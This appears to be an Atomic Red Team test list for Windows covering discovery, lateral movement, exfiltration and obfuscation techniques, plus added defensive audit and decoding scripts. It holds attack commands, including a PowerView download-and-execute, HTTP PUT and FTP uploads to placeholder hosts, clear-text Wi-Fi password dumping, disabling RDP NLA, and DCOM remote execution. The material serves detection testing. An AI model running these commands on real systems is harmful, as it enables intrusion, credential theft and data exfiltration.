Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-ChildItem -Path "HKLM:system\currentcontrolset\services" 
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
T1012 powershell windows Enumerate COM Objects in Registry with Powershell
Query Registry
This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. See: https://www.mandiant.com/resources/hunting-com-objects
New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > $env:temp\clsids.txt
ForEach ($CLSID in Get-Content "$env:temp\clsids.txt") {
  try {
    Write-Output "$($Position)-$($CLSID)"
    Write-Output "------------" | Out-File #{output_file} -Append
    Write-Output $CLSID | Out-File #{output_file} -Append
    # Instantiate the COM class and dump its members (methods and properties) to the output file
    $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))
    $handle | Get-Member -ErrorAction SilentlyContinue | Out-File #{output_file} -Append
    $Position += 1
  } catch {}
}
T1012 command_prompt elevated windows Reg query for AlwaysInstallElevated status
Query Registry
The reg query commands check the status of the AlwaysInstallElevated registry value under both the user (HKCU) and machine (HKLM) policy keys. If both queries return 0x1, AlwaysInstallElevated is enabled, and a regular user can install a Windows Installer (MSI) package with SYSTEM privileges, which an attacker can abuse to escalate privileges on the host. Both values must be set; one alone is not exploitable.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated      
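An added check for this test (not part of Atomic Red Team): the function below reads both policy values and reports them as one result, treating a missing key or value as "not set", since the escalation only works when both the machine and the user policy are enabled. Neither key needs elevation to read.

```powershell
# Added example: evaluate AlwaysInstallElevated the way a privilege-escalation checklist would.
# A missing key or value means the policy is not configured, which counts as disabled.
function Test-AlwaysInstallElevated {
    $paths = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $enabled = @{}
    foreach ($scope in $paths.Keys) {
        # Get-ItemProperty errors when the key or value is absent; suppress and treat as $null
        $value = (Get-ItemProperty -Path $paths[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        $enabled[$scope] = ($value -eq 1)
    }
    [PSCustomObject]@{
        MachineEnabled = $enabled['Machine']
        UserEnabled    = $enabled['User']
        # Exploitable only when both the machine and the user policy are set to 1
        Exploitable    = $enabled['Machine'] -and $enabled['User']
    }
}

$r = Test-AlwaysInstallElevated
$r
if ($r.Exploitable) { Write-Warning 'AlwaysInstallElevated is set in both hives: MSI packages install as SYSTEM' }
```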
T1012 command_prompt elevated windows Check Software Inventory Logging (SIL) status via Registry
Query Registry
Microsoft's Software Inventory Logging (SIL) collects information about the software installed on each host. An adversary can read its logs to passively check for the presence of software of interest to them. The status of SIL can be checked via the registry. [Reference](https://blog.talosintelligence.com/chinese-hacking-group-apt41-compromised-taiwanese-government-affiliated-research-institute-with-shadowpad-and-cobaltstrike-2/)
reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64
T1012 command_prompt windows Inspect SystemStartOptions Value in Registry
Query Registry
This test queries the SystemStartOptions value under HKLM\SYSTEM\CurrentControlSet\Control in the Windows registry. The value records the options the system was booted with, so reading it can reveal how the system is configured to start and identify security-related boot settings.
reg.exe query HKLM\SYSTEM\CurrentControlSet\Control /v SystemStartOptions
T1016 command_prompt windows System Network Configuration Discovery on Windows
System Network Configuration Discovery
Identifies network configuration information. Upon successful execution, cmd.exe spawns multiple commands to list network configuration settings. Output will be via stdout.
ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config
T1016 command_prompt windows List Windows Firewall Rules
System Network Configuration Discovery
Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
netsh advfirewall firewall show rule name=all
T1016 command_prompt windows System Network Configuration Discovery (TrickBot Style)
System Network Configuration Discovery
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn ipconfig /all, net config workstation, net view /all /domain, nltest /domain_trusts. Output will be via stdout.
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
T1016 powershell windows List Open Egress Ports
System Network Configuration Discovery
This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
$ports = Get-Content "#{port_file}"
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
    # Attempt a TCP connect to allports.exposed (which listens on every port) and wait up to 250 ms
    $test = New-Object System.Net.Sockets.TcpClient
    $wait = $test.BeginConnect("allports.exposed", $port, $null, $null)
    $wait.AsyncWaitHandle.WaitOne(250, $false) | Out-Null
    $totalports++
    if ($test.Connected) {
        $result = "$port open"
        Write-Host -ForegroundColor Green $result
        $result | Out-File -Encoding ASCII -Append $file
        $totalopen++
    }
    else {
        $result = "$port closed"
        Write-Host -ForegroundColor Red $result
        $result | Out-File -Encoding ASCII -Append $file
    }
    # Release the socket so a long port list does not exhaust handles
    $test.Close()
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -Append $file
Write-Host $results
T1016 command_prompt windows Adfind - Enumerate Active Directory Subnet Objects
System Network Configuration Discovery
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example of enumerating Active Directory subnet objects has been documented in ransomware intrusions. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
T1016 command_prompt windows Qakbot Recon
System Network Configuration Discovery
A list of commands known to be performed by Qakbot for recon purposes
"#{recon_commands}"
T1016 command_prompt windows DNS Server Discovery Using nslookup
System Network Configuration Discovery
Identifies the domain controllers of the endpoint's domain by using nslookup to query the _ldap._tcp.dc._msdcs SRV record. Qakbot abuses this query to gather information about the domain controller of the compromised host. Reference: https://securelist.com/qakbot-technical-analysis/103931/
nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
T1016.001 command_prompt windows Check internet connection using ping Windows
Internet Connection Discovery
Check internet connection using ping on Windows. The default target of the ping is 8.8.8.8 (Google Public DNS).
ping -n 4 #{ping_target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the ICMP/Ping protocol. The default target is 8.8.8.8 (Google Public DNS).
Test-NetConnection -ComputerName #{target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (TCP-HTTP)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound HTTP (Port 80) access. The default target is www.google.com.
Test-NetConnection -CommonTCPPort HTTP -ComputerName #{target}
T1016.001 powershell windows Check internet connection using Test-NetConnection in PowerShell (TCP-SMB)
Internet Connection Discovery
Check internet connection using PowerShell's Test-NetConnection cmdlet and the TCP protocol to check for outbound SMB (Port 445) access. The default target is 8.8.8.8.
Test-NetConnection -CommonTCPPort SMB -ComputerName #{target}
T1016.002 command_prompt windows Enumerate Stored Wi-Fi Profiles And Passwords via netsh
Wi-Fi Discovery
Upon successful execution, information about previously connected Wi-Fi networks will be displayed with their corresponding key (if present).
netsh wlan show profile * key=clear
T1018 command_prompt windows Remote System Discovery - net
Remote System Discovery
Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute net.exe view and display results of local systems on the network that have file and print sharing enabled.
net view /domain
net view
T1018 command_prompt windows Remote System Discovery - net group Domain Computers
Remote System Discovery
Identifies remote systems with net.exe by querying the Active Directory "Domain Computers" group. Upon successful execution, cmd.exe runs net.exe against Active Directory to list the members of the "Domain Computers" group. Output will be via stdout.
net group "Domain Computers" /domain
T1018 command_prompt windows Remote System Discovery - nltest
Remote System Discovery
Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
nltest.exe /dclist:#{target_domain}
T1018 command_prompt windows Remote System Discovery - ping sweep
Remote System Discovery
Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i  
T1018 command_prompt windows Remote System Discovery - arp
Remote System Discovery
Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
arp -a
T1018 powershell elevated windows Remote System Discovery - nslookup
Remote System Discovery
PowerShell script that runs nslookup via cmd.exe against the local /24 network of the first network adapter listed in ipconfig. Upon successful execution, PowerShell determines the IP range (via ipconfig), loops over it, and executes nslookup against each address. Output will be via stdout.
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
T1018 command_prompt elevated windows Remote System Discovery - adidnsdump
Remote System Discovery
adidnsdump enumerates and exports all DNS records in an Active Directory-integrated DNS zone for internal network reconnaissance. Python 3 and adidnsdump must be installed; use the get_prereq_commands to meet the prerequisites for this test. Successful execution of this test lists the DNS zones in the terminal.
"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
T1018 command_prompt windows Adfind - Enumerate Active Directory Computer Objects
Remote System Discovery
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example of enumerating Active Directory computer objects has been documented in ransomware intrusions. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
T1018 command_prompt windows Adfind - Enumerate Active Directory Domain Controller Objects
Remote System Discovery
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example of enumerating Active Directory domain controller objects has been documented in ransomware intrusions. References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
T1018 powershell windows Enumerate domain computers within Active Directory using DirectorySearcher
Remote System Discovery
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
  $Computer = $Computer.Properties.name
  if (!$Computer) { Continue }
  Write-Host $Computer}
T1018 powershell windows Enumerate Active Directory Computers with Get-AdComputer
Remote System Discovery
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. Upon successful execution a listing of Computers will output with their paths in AD. Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
Get-AdComputer -Filter *
T1018 powershell windows Enumerate Active Directory Computers with ADSISearcher
Remote System Discovery
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. Upon successful execution a listing of computers will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
T1018 powershell windows Get-DomainController with PowerView
Remote System Discovery
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
T1018 powershell windows Get-WmiObject to Enumerate Domain Controllers
Remote System Discovery
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution a listing of Systems from AD will output with their paths. Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
T1018 command_prompt windows Remote System Discovery - net group Domain Controller
Remote System Discovery
Identifies remote systems with net.exe by querying the Active Directory "Domain Controllers" group. Upon successful execution, cmd.exe runs net.exe against Active Directory to list the domain controllers in the domain. Output will be via stdout.
net group /domain "Domain controllers"
T1018 powershell windows Enumerate Remote Hosts with Netscan
Remote System Discovery
This test uses Netscan to identify remote hosts in a specified network range.
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
T1020 powershell windows IcedID Botnet HTTP PUT
Automated Exfiltration
Creates a text file, tries to upload it to a server via the HTTP PUT method with a Content-Type header, then deletes the created file.
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
T1020 powershell windows Exfiltration via Encrypted FTP
Automated Exfiltration
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
T1021.001 powershell windows RDP to DomainController
Remote Desktop Protocol
Attempt an RDP session via Remote Desktop Application to a DomainController.
$Server=#{logonserver}
$User = Join-Path #{domain} #{username}
$Password="#{password}"
cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password
mstsc /v:$Server
echo "RDP connection established"
T1021.001 powershell elevated windows Changing RDP Port to Non Standard Port via Powershell
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Powershell
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port}
New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
T1021.001 command_prompt elevated windows Changing RDP Port to Non Standard Port via Command_Prompt
Remote Desktop Protocol
Changing RDP Port to Non Standard Port via Command_Prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f
netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
T1021.001 command_prompt windows Disable NLA for RDP via Command Prompt
Remote Desktop Protocol
Disables Network Level Authentication (NLA) for RDP by changing a registry value via Command Prompt. Disabling NLA for RDP allows a remote user to interact with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/ See also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
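An added audit to pair with the three RDP tests above (example code, not from Atomic Red Team): it reads the listener port and NLA value that the tests change, plus fDenyTSConnections, and lists enabled inbound allow rules that expose the configured port. After running the tests in a lab, NonDefaultPort should flip to True, NlaRequired to False, and the RDPPORTLatest-TCP-In rule should appear in the list. The firewall part needs the NetSecurity module (Windows 8 / Server 2012 and later), and port ranges in rules are not expanded; that is a simplification.

```powershell
# Added example: audit the RDP settings the T1021.001 tests modify. Registry paths are the
# documented Terminal Server locations; they are readable without elevation.
function Get-RdpPosture {
    $ts     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $rdpTcp = "$ts\WinStations\RDP-Tcp"

    $port = (Get-ItemProperty -Path $rdpTcp -Name PortNumber).PortNumber
    $nla  = (Get-ItemProperty -Path $rdpTcp -Name UserAuthentication).UserAuthentication
    $deny = (Get-ItemProperty -Path $ts -Name fDenyTSConnections).fDenyTSConnections

    # Enabled inbound TCP allow rules whose local port is the RDP listener (or Any).
    # Ranges such as 3000-4000 are not expanded here.
    $rules = Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow -ErrorAction SilentlyContinue |
        Where-Object {
            $pf = $_ | Get-NetFirewallPortFilter
            $pf.Protocol -eq 'TCP' -and ($pf.LocalPort -contains "$port" -or $pf.LocalPort -contains 'Any')
        } | Select-Object -ExpandProperty DisplayName

    [PSCustomObject]@{
        RdpEnabled        = ($deny -eq 0)
        ListenerPort      = $port
        NonDefaultPort    = ($port -ne 3389)
        NlaRequired       = ($nla -eq 1)
        InboundAllowRules = $rules
    }
}

$posture = Get-RdpPosture
$posture
if (-not $posture.NlaRequired) { Write-Warning 'NLA is disabled: the sign-in screen is reachable before authentication' }
if ($posture.NonDefaultPort)   { Write-Warning "RDP listener moved to port $($posture.ListenerPort)" }
```

Changing PortNumber only takes effect after the Remote Desktop Services service restarts or the host reboots, so a check run immediately after the test sees the new registry value while the old listener is still bound.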
T1021.002 command_prompt windows Map admin share
SMB/Windows Admin Shares
Connects to a remote admin share with net use.
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.002 powershell windows Map Admin Share PowerShell
SMB/Windows Admin Shares
Map Admin share utilizing PowerShell
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
T1021.002 command_prompt elevated windows Copy and Execute File with PsExec
SMB/Windows Admin Shares
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 command_prompt elevated windows Execute command writing output to local Admin Share
SMB/Windows Admin Shares
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.003 powershell windows PowerShell Lateral Movement using MMC20
Distributed Component Object Model
PowerShell lateral movement using the MMC20.Application COM object over DCOM. Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, calc.exe will be spawned on the remote computer as a child of mmc.exe.
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
T1021.003 powershell windows PowerShell Lateral Movement Using Excel Application Object
Distributed Component Object Model
PowerShell lateral movement using the Excel.Application COM object over DCOM. Reference: https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 The test first copies calc.exe to the user's WindowsApps folder as foxprow.exe (WindowsApps is on the user PATH, and ActivateMicrosoftApp(5) makes Excel look for FoxPro's executable by that name), then activates it through the remote Excel.Application object. Upon successful execution, excel.exe on the remote computer will spawn the renamed calc.exe.
copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"))
$com.ActivateMicrosoftApp("5")
T1021.004 powershell elevated windows ESXi - Enable SSH via PowerCLI
SSH
An adversary enables the SSH service on an ESXi host to maintain persistent access to the host and to carry out subsequent operations.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 command_prompt windows ESXi - Enable SSH via VIM-CMD
SSH
An adversary enables SSH on an ESXi host to maintain persistence and create another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1021.006 powershell elevated windows Enable Windows Remote Management
Windows Remote Management
Enables WinRM via PowerShell. Upon successful execution, PowerShell runs Enable-PSRemoting, allowing remote PowerShell access.
Enable-PSRemoting -Force
T1021.006 powershell windows Remote Code Execution with PS Credentials Using Invoke-Command
Windows Remote Management
Simulate lateral movement with PowerShell Remoting on the local host. Upon successful execution, PowerShell will execute whoami using Invoke-Command, targeting the local machine as remote target.
Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
T1021.006 powershell elevated windows WinRM Access with Evil-WinRM
Windows Remote Management
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
T1025 command_prompt windows Identify Documents on USB and Removable Media via PowerShell
Data from Removable Media
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files (e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics how adversaries might scan for sensitive documents on removable devices for exfiltration or analysis.
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
T1027 powershell windows Execute base64-encoded PowerShell
Obfuscated Files or Information
Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell.exe runs the encoded command; the default command is Write-Host "Hey, Atomic!", so that string appears on stdout.
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
powershell.exe -EncodedCommand $EncodedCommand
T1027 powershell windows Execute base64-encoded PowerShell from Windows Registry
Obfuscated Files or Information
Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry.
$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand

Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
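An added triage helper for the two encoded-command tests above (not the page's own code): given a process command line from process-creation telemetry, it locates the base64 argument behind -EncodedCommand or any of the shorter forms powershell.exe accepts, skips -ExecutionPolicy, and decodes it as UTF-16LE. The same decoder works on the value the registry variant stores. The sample command lines are constructed for this example, with the encoded payload generated using the page's own recipe.

```powershell
# Added example: decode the -EncodedCommand argument from a powershell.exe command line,
# as seen in Sysmon Event 1 or Security 4688 records.
function ConvertFrom-EncodedCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts -e, -ec, -en, -enc, ... -EncodedCommand. Anything starting with
    # -ex or -ep is ExecutionPolicy and must not match. The base64 may be bare or quoted.
    $pattern = '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+["'']?([A-Za-z0-9+/=]{8,})'
    $m = [regex]::Match($CommandLine, $pattern)
    if (-not $m.Success) { return $null }

    try {
        $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
    } catch {
        return $null                     # not valid base64, so not an encoded command
    }
    # -EncodedCommand is always UTF-16LE, which is why encoded payloads show the A.A.A pattern
    [Text.Encoding]::Unicode.GetString($bytes)
}

# Constructed samples: one encoded with the recipe from the test above, one that must not match
$payload = 'Write-Host "Hey, Atomic!"'
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    "powershell.exe -NoProfile -enc $b64",
    "powershell.exe -ExecutionPolicy Unrestricted -Command Get-Service"
)
foreach ($s in $samples) {
    $decoded = ConvertFrom-EncodedCommandLine $s
    if ($decoded) { "DECODED: $decoded" } else { "no encoded command in: $s" }
}
```

Decoding is only the first layer: the registry variant above yields a command line containing IEX and FromBase64String rather than a base64 argument, so a rule that fires only on -EncodedCommand misses it. Match on the decoding primitives as well.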
T1027 command_prompt windows Execution from Compressed File
Obfuscated Files or Information
Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
"PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe"
T1027 powershell windows DLP Evasion via Sensitive Data in VBA Macro over email
Obfuscated Files or Information
Upon successful execution, an Excel workbook whose VBA macro contains sensitive data will be sent outside the network by email. The sensitive data consists of roughly 20 simulated credit card numbers that pass the Luhn check.
Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server}
T1027 powershell windows DLP Evasion via Sensitive Data in VBA Macro over HTTP
Obfuscated Files or Information
Upon successful execution, an Excel workbook whose VBA macro contains sensitive data will be sent outside the network over HTTP. The sensitive data consists of roughly 20 simulated credit card numbers that pass the Luhn check.
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}"
T1027 powershell windows Obfuscated Command in PowerShell
Obfuscated Files or Information
This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
$cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
